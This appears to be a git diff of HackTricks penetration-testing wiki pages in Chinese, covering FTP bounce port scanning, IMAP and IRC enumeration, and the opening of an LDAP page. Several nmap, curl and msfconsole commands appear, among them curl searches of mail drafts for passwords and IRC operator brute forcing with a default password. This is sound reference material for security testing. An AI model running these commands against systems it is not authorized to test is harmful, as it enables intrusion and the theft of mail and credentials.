**立即提供的漏洞评估和渗透测试设置**。从任何地方运行完整的渗透测试具有20多种工具和功能从侦察到报告。我们不取代渗透测试人员 - 我们开发定制工具、检测和利用模块,为他们节省时间深入挖掘、弹出shell并享受乐趣。
**即时可用的漏洞评估和渗透测试设置**。从任何地方运行完整的渗透测试使用20多个工具和功能从侦察到报告。我们不替代渗透测试人员 - 我们开发自定义工具、检测和利用模块,以便让他们有更多时间深入挖掘、获取shell并享受乐趣。
{% embed url="https://pentest-tools.com/" %}
{% hint style="success" %}
学习和实践AWS黑客技术<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks培训AWS红队专家ARTE**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
学习和实践GCP黑客技术<img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks培训GCP红队专家GRTE**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>从零开始学习AWS黑客技术成为专家</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTEHackTricks AWS Red Team Expert</strong></a><strong></strong></summary>
<summary>支持HackTricks</summary>
支持HackTricks的其他方式
* 如果您想看到您的**公司在HackTricks中做广告**或**下载PDF格式的HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
* 获取[**官方PEASS & HackTricks周边产品**](https://peass.creator-spring.com)
* 发现[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们的独家[**NFTs**](https://opensea.io/collection/the-peass-family)收藏品
* **加入** 💬 [**Discord群**](https://discord.gg/hRep4RUj7f) 或 [**电报群**](https://t.me/peass) 或在**Twitter**上关注我们 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**。**
* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。
* 查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
* **加入** 💬 [**Discord群组**](https://discord.gg/hRep4RUj7f)或[**电报群组**](https://t.me/peass)或**在** **Twitter** 🐦 **上关注我们** [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **通过向** [**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享黑客技巧。
</details>
{% endhint %}

56
network-services-pentesting/pentesting-ftp/ftp-bounce-attack.md
View file

@ -1,18 +1,19 @@
# FTP反弹攻击 - 扫描
# FTP Bounce attack - Scan
{% hint style="success" %}
学习与实践 AWS 黑客技术:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks 培训 AWS 红队专家 (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
学习与实践 GCP 黑客技术:<img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks 培训 GCP 红队专家 (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>从零开始学习AWS黑客技术成为专家</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTEHackTricks AWS红队专家</strong></a><strong></strong></summary>
<summary>支持 HackTricks</summary>
支持HackTricks的其他方式
* 如果您想看到您的**公司在HackTricks中做广告**或**下载PDF格式的HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
* 获取[**官方PEASS & HackTricks周边产品**](https://peass.creator-spring.com)
* 探索[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们的独家[**NFTs**](https://opensea.io/collection/the-peass-family)
* **加入** 💬 [**Discord群**](https://discord.gg/hRep4RUj7f) 或 [**电报群**](https://t.me/peass) 或 **关注**我们的**Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**。**
* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。
* 查看 [**订阅计划**](https://github.com/sponsors/carlospolop)!
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**电报群组**](https://t.me/peass) 或 **关注** 我们的 **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **通过向** [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github 仓库提交 PR 来分享黑客技巧。
</details>
{% endhint %}
**Try Hard Security Group**
@ -22,27 +23,27 @@
***
## FTP反弹 - 扫描
## FTP Bounce - Scanning
### 手动
### Manual
1. 连接到易受攻击的FTP
2. 使用\*\*`PORT`\*\*或**`EPRT`**但只能选择其中一个建立与要扫描的_IP:端口_的连接:
1. 连接到易受攻击的 FTP
2. 使用 **`PORT`** 或 **`EPRT`**(但只能使用其中一个)来与您想要扫描的 _\<IP:Port>_ 建立连接:
`PORT 172,32,80,80,0,8080`\
`EPRT |2|172.32.80.80|8080|`
3. 使用**`LIST`**这只会向连接的_IP:端口_发送FTP文件夹中当前文件的列表并检查可能的响应`150 文件状态正常`(这表示端口是打开的)或`425 未建立连接`(这表示端口是关闭的)
4. 您也可以使用**`RETR /file/in/ftp`**而不是`LIST`,并寻找类似的`打开/关闭`响应。
3. 使用 **`LIST`**(这将仅向连接的 _\<IP:Port>_ 发送 FTP 文件夹中当前文件的列表)并检查可能的响应:`150 File status okay`(这意味着端口是开放的)或 `425 No connection established`(这意味着端口是关闭的)
4. 除了 `LIST`,您还可以使用 **`RETR /file/in/ftp`** 并寻找类似的 `Open/Close` 响应。
使用**PORT**的示例172.32.80.80的端口8080是开的端口7777是关闭的
使用 **PORT** 的示例172.32.80.80 的端口 8080 是开的,端口 7777 是关闭的):
![](<../../.gitbook/assets/image (241).png>)
使用**`EPRT`**的相同示例(图中省略了身份验证):
使用 **`EPRT`** 的相同示例(图中省略了身份验证):
![](<../../.gitbook/assets/image (539).png>)
使用`EPRT`而不是`LIST`打开端口(不同环境):
使用 `EPRT` 而不是 `LIST` 打开端口(不同环境):
![](<../../.gitbook/assets/image (875).png>)
@ -52,22 +53,23 @@ nmap -b <name>:<pass>@<ftp_server> <victim>
nmap -Pn -v -p 21,80 -b ftp:ftp@10.2.1.5 127.0.0.1 #Scan ports 21,80 of the FTP
nmap -v -p 21,22,445,80,443 -b ftp:ftp@10.2.1.5 192.168.0.1/24 #Scan the internal network (of the FTP) ports 21,22,445,80,443
```
**尝试困难安全团队**
**努力安全组**
<figure><img src="../../.gitbook/assets/telegram-cloud-document-1-5159108904864449420.jpg" alt=""><figcaption></figcaption></figure>
{% embed url="https://discord.gg/tryhardsecurity" %}
{% hint style="success" %}
学习和实践 AWS 黑客技术:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks 培训 AWS 红队专家 (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
学习和实践 GCP 黑客技术:<img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks 培训 GCP 红队专家 (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>从零开始学习AWS黑客技术成为英雄使用</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTEHackTricks AWS红队专家</strong></a><strong></strong></summary>
<summary>支持 HackTricks</summary>
支持HackTricks的其他方式
* 如果您想看到您的**公司在HackTricks中做广告**或**下载PDF格式的HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
* 获取[**官方PEASS & HackTricks周边产品**](https://peass.creator-spring.com)
* 发现[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们的独家[**NFTs**](https://opensea.io/collection/the-peass-family)收藏品
* **加入** 💬 [**Discord团队**](https://discord.gg/hRep4RUj7f) 或 [**telegram团队**](https://t.me/peass) 或在**Twitter**上关注我们 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**。**
* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。
* 查看 [**订阅计划**](https://github.com/sponsors/carlospolop)!
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**电报群组**](https://t.me/peass) 或 **在** **Twitter** 🐦 **上关注我们** [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **通过向** [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github 仓库提交 PR 分享黑客技巧。
</details>
{% endhint %}

74
network-services-pentesting/pentesting-imap.md
View file

@ -1,18 +1,19 @@
# 143,993 - 渗透测试 IMAP
# 143,993 - Pentesting IMAP
{% hint style="success" %}
学习与实践 AWS 黑客技术:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks 培训 AWS 红队专家 (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
学习与实践 GCP 黑客技术:<img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks 培训 GCP 红队专家 (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>从零开始学习 AWS 黑客技术,成为专家</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTEHackTricks AWS 红队专家)</strong></a><strong></strong></summary>
<summary>支持 HackTricks</summary>
支持 HackTricks 的其他方式:
* 如果您想看到您的**公司在 HackTricks 中做广告**或**下载 HackTricks 的 PDF**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
* 获取[**官方 PEASS & HackTricks 商品**](https://peass.creator-spring.com)
* 探索[**PEASS 家族**](https://opensea.io/collection/the-peass-family),我们的独家[**NFTs**](https://opensea.io/collection/the-peass-family)
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**电报群组**](https://t.me/peass) 或在 **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)** 上关注我们**。
* 通过向 [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github 仓库提交 PR 来**分享您的黑客技巧**。
* 查看 [**订阅计划**](https://github.com/sponsors/carlospolop)!
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**Telegram 群组**](https://t.me/peass) 或 **关注** 我们的 **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **通过向** [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub 仓库提交 PR 分享黑客技巧。
</details>
{% endhint %}
**Try Hard Security Group**
@ -22,14 +23,14 @@
***
## 互联网消息访问协议
## 互联网邮件访问协议
**互联网消息访问协议IMAP**旨在使用户能够通过互联网连接从任何位置**访问其电子邮件消息**。实质上,电子邮件**保存在服务器上**,而不是下载并存储在个人设备上。这意味着当电子邮件被访问或阅读时,是直接从服务器**读取**的。这种能力允许方便地从**多个设备**检查电子邮件,确保无论使用哪种设备,都不会错过任何消息。
**互联网邮件访问协议 (IMAP)** 的设计目的是使用户能够**从任何位置访问他们的电子邮件消息**,主要通过互联网连接。实际上,电子邮件**保留在服务器上**,而不是下载并存储在个人设备上。这意味着当访问或阅读电子邮件时,是**直接从服务器**进行的。这一功能允许用户从**多个设备**方便地检查电子邮件,确保无论使用何种设备都不会错过任何消息。
默认情况下IMAP 协议在两个端口上运行
默认情况下IMAP 协议在两个端口上工作
* **端口 143** - 这是默认的 IMAP 非加密端口
* **端口 993** - 这是您需要使用的端口,如果要安全连接使用 IMAP。
* **端口 993** - 如果您想安全地使用 IMAP 连接,则需要使用此端口
```
PORT STATE SERVICE REASON
143/tcp open imap syn-ack
@ -39,9 +40,9 @@ PORT STATE SERVICE REASON
nc -nv <IP> 143
openssl s_client -connect <IP>:993 -quiet
```
### NTLM认证 - 信息泄露
### NTLM Auth - 信息泄露
如果服务器支持NTLM认证Windows您可以获取敏感信息版本
如果服务器支持 NTLM 认证Windows您可以获取敏感信息版本
```
root@kali: telnet example.com 143
* OK The Microsoft Exchange IMAP4 service is ready.
@ -50,13 +51,13 @@ root@kali: telnet example.com 143
>> TlRMTVNTUAABAAAAB4IIAAAAAAAAAAAAAAAAAAAAAAA=
+ TlRMTVNTUAACAAAACgAKADgAAAAFgooCBqqVKFrKPCMAAAAAAAAAAEgASABCAAAABgOAJQAAAA9JAEkAUwAwADEAAgAKAEkASQBTADAAMQABAAoASQBJAFMAMAAxAAQACgBJAEkAUwAwADEAAwAKAEkASQBTADAAMQAHAAgAHwMI0VPy1QEAAAAA
```
者使用 **nmap** 插件 `imap-ntlm-info.nse` 来**自动化**这个过程。
**自动化**此操作,使用**nmap**插件`imap-ntlm-info.nse`
### [IMAP暴力破解](../generic-methodologies-and-resources/brute-force.md#imap)
## 语法
来自[这里](https://donsutherland.org/crib/imap)的IMAP命令示例
IAMP命令示例来自[这里](https://donsutherland.org/crib/imap):
```
Login
A1 LOGIN username password
@ -111,40 +112,40 @@ apt install evolution
### CURL
使用[CURL](https://ec.haxx.se/usingcurl/usingcurl-reademail#imap)可以进行基本导航,但文档细节较少,建议查看[源代码](https://github.com/curl/curl/blob/master/lib/imap.c)以获取精确细节。
基本导航可以使用 [CURL](https://ec.haxx.se/usingcurl/usingcurl-reademail#imap) 实现,但文档内容较少,因此建议查看 [源代码](https://github.com/curl/curl/blob/master/lib/imap.c) 以获取准确的细节。
1. 列出邮箱imap 命令 `LIST "" "*"`
1. 列出邮箱 (imap 命令 `LIST "" "*"`)
```bash
curl -k 'imaps://1.2.3.4/' --user user:pass
```
2. 列出邮箱中的消息imap命令 `SELECT INBOX` 然后 `SEARCH ALL`
2. 列出邮箱中的消息imap 命令 `SELECT INBOX` 然后 `SEARCH ALL`
```bash
curl -k 'imaps://1.2.3.4/INBOX?ALL' --user user:pass
```
搜索的结果是一个消息索引列表。
搜索的结果是消息索引列表。
也可以提供更复杂的搜索条件。例如,在邮件正文中搜索带有密码的草稿:
还可以提供更复杂的搜索条件。例如,搜索邮件正文中包含密码的草稿:
```bash
curl -k 'imaps://1.2.3.4/Drafts?TEXT password' --user user:pass
```
一个关于可能的搜索项的很好概述位于[这里](https://www.atmail.com/blog/imap-commands/)
一个很好的搜索术语概述可以在 [这里](https://www.atmail.com/blog/imap-commands/) 找到
3. 下载一消息imap 命令 `SELECT Drafts` 然后 `FETCH 1 BODY[]`
3. 下载一消息imap 命令 `SELECT Drafts` 然后 `FETCH 1 BODY[]`
```bash
curl -k 'imaps://1.2.3.4/Drafts;MAILINDEX=1' --user user:pass
```
邮件索引将与搜索操作返回的索引相同。
也可以使用`UID`(唯一标识符)来访问消息,但这种方法不太方便,因为搜索命令需要手动格式化。例如
也可以使用 `UID`(唯一标识符)来访问消息,但这不太方便,因为搜索命令需要手动格式化。例如
```bash
curl -k 'imaps://1.2.3.4/INBOX' -X 'UID SEARCH ALL' --user user:pass
curl -k 'imaps://1.2.3.4/INBOX;UID=1' --user user:pass
```
另外可以下载消息的部分内容例如前5条消息的主题和发件人需要使用 `-v` 选项来查看主题和发件人):
此外可以仅下载消息的部分内容例如前5条消息的主题和发件人需要使用`-v`才能查看主题和发件人):
```bash
$ curl -k 'imaps://1.2.3.4/INBOX' -X 'FETCH 1:5 BODY[HEADER.FIELDS (SUBJECT FROM)]' --user user:pass -v 2>&1 | grep '^<'
```
虽然,编写一个小的for循环可能更清晰
虽然,写一个简单的 for 循环可能更简洁
```bash
for m in {1..5}; do
echo $m
@ -156,7 +157,7 @@ done
* `port:143 CAPABILITY`
* `port:993 CAPABILITY`
**尝试困难安全团队**
**Try Hard Security Group**
<figure><img src="../.gitbook/assets/telegram-cloud-document-1-5159108904864449420.jpg" alt=""><figcaption></figcaption></figure>
@ -192,16 +193,17 @@ Description: IMAP enumeration without the need to run msfconsole
Note: sourced from https://github.com/carlospolop/legion
Command: msfconsole -q -x 'use auxiliary/scanner/imap/imap_version; set RHOSTS {IP}; set RPORT 143; run; exit'
```
{% hint style="success" %}
学习与实践 AWS 黑客技术:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks 培训 AWS 红队专家 (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
学习与实践 GCP 黑客技术:<img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks 培训 GCP 红队专家 (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>从零开始学习AWS黑客技术成为专家</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTEHackTricks AWS Red Team Expert</strong></a><strong></strong></summary>
<summary>支持 HackTricks</summary>
支持HackTricks的其他方式
* 如果您想看到您的**公司在HackTricks中做广告**或**下载PDF格式的HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
* 获取[**官方PEASS & HackTricks周边产品**](https://peass.creator-spring.com)
* 探索[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们的独家[**NFTs**](https://opensea.io/collection/the-peass-family)
* **加入** 💬 [**Discord群组**](https://discord.gg/hRep4RUj7f) 或 [**电报群组**](https://t.me/peass) 或 **在Twitter上** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)** 上关注我们**。
* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。
* 查看 [**订阅计划**](https://github.com/sponsors/carlospolop)!
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**Telegram 群组**](https://t.me/peass) 或 **关注** 我们的 **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **通过向** [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub 仓库提交 PR 分享黑客技巧。
</details>
{% endhint %}

60
network-services-pentesting/pentesting-irc.md
View file

@ -1,26 +1,27 @@
# 194,6667,6660-7000 - 渗透测试 IRC
# 194,6667,6660-7000 - Pentesting IRC
{% hint style="success" %}
学习和实践 AWS 黑客技术:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks 培训 AWS 红队专家 (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
学习和实践 GCP 黑客技术:<img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks 培训 GCP 红队专家 (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>从零开始学习 AWS 黑客技术,成为专家</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTEHackTricks AWS 红队专家)</strong></a><strong></strong></summary>
<summary>支持 HackTricks</summary>
支持 HackTricks 的其他方式:
* 如果您想看到您的**公司在 HackTricks 中做广告**或**下载 PDF 版本的 HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
* 获取[**官方 PEASS & HackTricks 商品**](https://peass.creator-spring.com)
* 探索[**PEASS 家族**](https://opensea.io/collection/the-peass-family),我们的独家[**NFTs**](https://opensea.io/collection/the-peass-family)
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**电报群组**](https://t.me/peass) 或在 **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)** 上关注**我们。
* 通过向 [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github 仓库提交 PR 来分享您的黑客技巧。
* 查看 [**订阅计划**](https://github.com/sponsors/carlospolop)!
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**Telegram 群组**](https://t.me/peass) 或 **关注** 我们的 **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **通过向** [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub 仓库提交 PR 分享黑客技巧。
</details>
{% endhint %}
### [WhiteIntel](https://whiteintel.io)
<figure><img src="../.gitbook/assets/image (1227).png" alt=""><figcaption></figcaption></figure>
[**WhiteIntel**](https://whiteintel.io) 是一个由 **暗网** 提供支持的搜索引擎,提供免费功能,用于检查公司或其客户是否受到 **窃取恶意软件****侵害**。
[**WhiteIntel**](https://whiteintel.io) 是一个由 **暗网** 驱动的搜索引擎,提供 **免费** 功能以检查公司或其客户是否被 **窃取恶意软件** **入侵**。
WhiteIntel 的主要目标是打击由窃取信息的恶意软件导致的账户劫持和勒索软件攻击。
WhiteIntel 的主要目标是打击由于信息窃取恶意软件导致的账户接管和勒索软件攻击。
您可以访问他们的网站并免费尝试他们的引擎:
@ -30,20 +31,20 @@ WhiteIntel 的主要目标是打击由窃取信息的恶意软件导致的账户
## 基本信息
IRC 最初是一个 **纯文本协议**,由 IANA 分配了 **194/TCP**,但通常在 **6667/TCP** 和类似端口上运行,以避免需要 **root 权限** 运行
IRC 最初是一个 **纯文本协议**,由 IANA 分配了 **194/TCP**,但通常在 **6667/TCP** 和类似端口上运行,以避免需要 **root 权限** 进行操作
只需一个 **昵称** 就可以连接到服务器。连接后,服务器会对用户的 IP 执行反向 DNS 查找。
连接到服务器只需要一个 **昵称**。连接后,服务器会对用户的 IP 进行反向 DNS 查找。
用户分为 **操作员**他们需要一个 **用户名****密码** 来获得更多权限,以及普通 **用户**。操作员具有不同级别的特权,管理员位于顶部
用户分为 **操作员**需要 **用户名****密码** 以获得更多访问权限,以及普通 **用户**。操作员具有不同级别的权限,管理员位于最高层
**默认端口:** 194, 6667, 6660-7000
```
PORT STATE SERVICE
6667/tcp open irc
```
## 枚举
## Enumeration
### 横幅
### Banner
IRC 可以支持 **TLS**
```bash
@ -52,7 +53,7 @@ openssl s_client -connect <IP>:<PORT> -quiet
```
### 手动
在这里,您可以看到如何使用一些**随机昵称**连接并访问IRC然后枚举一些有趣的信息。您可以在[这里](https://en.wikipedia.org/wiki/List\_of\_Internet\_Relay\_Chat\_commands#USERIP)了解更多IRC命令。
在这里,您可以看到如何使用一些 **随机昵称** 连接和访问 IRC然后枚举一些有趣的信息。您可以在 [这里](https://en.wikipedia.org/wiki/List\_of\_Internet\_Relay\_Chat\_commands#USERIP) 学习更多 IRC 命令。
```bash
#Connection with random nickname
USER ran213eqdw123 0 * ran213eqdw123
@ -81,13 +82,13 @@ JOIN <CHANNEL_NAME> #Connect to a channel
#Operator creds Brute-Force
OPER <USERNAME> <PASSWORD>
```
你也可以尝试使用密码登录服务器。ngIRCd的默认密码是 `wealllikedebian`
您还可以尝试使用密码登录服务器。ngIRCd 的默认密码是 `wealllikedebian`
```bash
PASS wealllikedebian
NICK patrick
USER test1 test2 <IP> :test3
```
### **查找并扫描 IRC 服务**
### **查找和扫描IRC服务**
```bash
nmap -sV --script irc-botnet-channels,irc-info,irc-unrealircd-backdoor -p 194,6660-7000 <ip>
```
@ -101,24 +102,25 @@ nmap -sV --script irc-botnet-channels,irc-info,irc-unrealircd-backdoor -p 194,66
<figure><img src="../.gitbook/assets/image (1227).png" alt=""><figcaption></figcaption></figure>
[**WhiteIntel**](https://whiteintel.io) 是一个由**暗网**推动的搜索引擎,提供免费功能,用于检查公司或其客户是否受到**窃取恶意软件**的**损害**
[**WhiteIntel**](https://whiteintel.io) 是一个由 **暗网** 驱动的搜索引擎,提供 **免费** 功能以检查公司或其客户是否被 **窃取恶意软件** **入侵**
WhiteIntel的主要目标是打击由窃取信息恶意软件导致的账户劫持和勒索软件攻击。
WhiteIntel 的主要目标是打击由于信息窃取恶意软件导致的账户接管和勒索软件攻击。
您可以访问他们的网站并免费尝试他们的引擎:
{% embed url="https://whiteintel.io" %}
{% hint style="success" %}
学习和实践 AWS 黑客技术:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks 培训 AWS 红队专家 (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
学习和实践 GCP 黑客技术:<img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks 培训 GCP 红队专家 (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>从零开始学习AWS黑客技术成为专家</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTEHackTricks AWS红队专家</strong></a><strong></strong></summary>
<summary>支持 HackTricks</summary>
支持HackTricks的其他方式
* 如果您想在HackTricks中看到您的**公司广告**或**下载PDF格式的HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
* 获取[**官方PEASS & HackTricks周边产品**](https://peass.creator-spring.com)
* 发现[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们的独家[NFTs](https://opensea.io/collection/the-peass-family)收藏品
* **加入** 💬 [**Discord群**](https://discord.gg/hRep4RUj7f) 或 [**电报群**](https://t.me/peass) 或在**Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**上关注**我们。
* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。
* 查看 [**订阅计划**](https://github.com/sponsors/carlospolop)!
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**电报群组**](https://t.me/peass) 或 **在** **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** 上关注我们。**
* **通过向** [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github 仓库提交 PR 来分享黑客技巧。
</details>
{% endhint %}

140
network-services-pentesting/pentesting-ldap.md
View file

@ -1,34 +1,35 @@
# 389, 636, 3268, 3269 - LDAP渗透测试
# 389, 636, 3268, 3269 - Pentesting LDAP
{% hint style="success" %}
Learn & practice AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Learn & practice GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>从零开始学习AWS黑客技术成为专家</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTEHackTricks AWS红队专家</strong></a><strong></strong></summary>
<summary>Support HackTricks</summary>
支持HackTricks的其他方式
* 如果您想看到您的**公司在HackTricks中做广告**或**下载PDF格式的HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
* 获取[**官方PEASS & HackTricks周边产品**](https://peass.creator-spring.com)
* 探索[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们的独家[**NFTs**](https://opensea.io/collection/the-peass-family)
* **加入** 💬 [**Discord群**](https://discord.gg/hRep4RUj7f) 或 [**电报群**](https://t.me/peass) 或 **关注**我们的**Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**。**
* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。
* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details>
{% endhint %}
**LDAP**(轻量级目录访问协议)主要用于在公共和私有网络中定位各种实体如组织、个人和资源如文件和设备。与其前身DAP相比LDAP提供了一种简化的方法代码占用空间更小。
**LDAP**(轻量级目录访问协议)的主要用途是定位各种实体,如组织、个人以及网络中的资源,如文件和设备,包括公共和私有网络。与其前身 DAP 相比,它提供了一种更简化的方法,代码占用更小。
LDAP目录被结构化为允许它们分布在多个服务器上,每个服务器都有目录的**复制**和**同步**版本称为目录系统代理DSA。处理请求的责任完全由LDAP服务器承担它可能根据需要与其他DSA通信,以向请求者提供统一的响应。
LDAP 目录的结构允许其在多个服务器之间分布,每个服务器都存储一个**复制**和**同步**的目录版本称为目录系统代理DSA。处理请求的责任完全由 LDAP 服务器承担,必要时可以与其他 DSA 通信,以向请求者提供统一的响应。
LDAP目录的组织类似于**树形层次结构,从顶部的根目录开始**。这向下分支到国家,进一步分为组织,然后到代表各个部门或部门的组织单位,最终达到个体实体级别,包括人员和共享资源,如文件和打印机
LDAP 目录的组织结构类似于**树形层次结构,从根目录开始**。这向下分支到国家,然后进一步划分为组织,再到代表各个部门或单位的组织单位,最终达到包括个人和共享资源(如文件和打印机)在内的个体实体级别
**默认端口:** 389和636ldaps。全局目录ActiveDirectory中的LDAP默认在端口3268上提供LDAPS在端口3269上提供
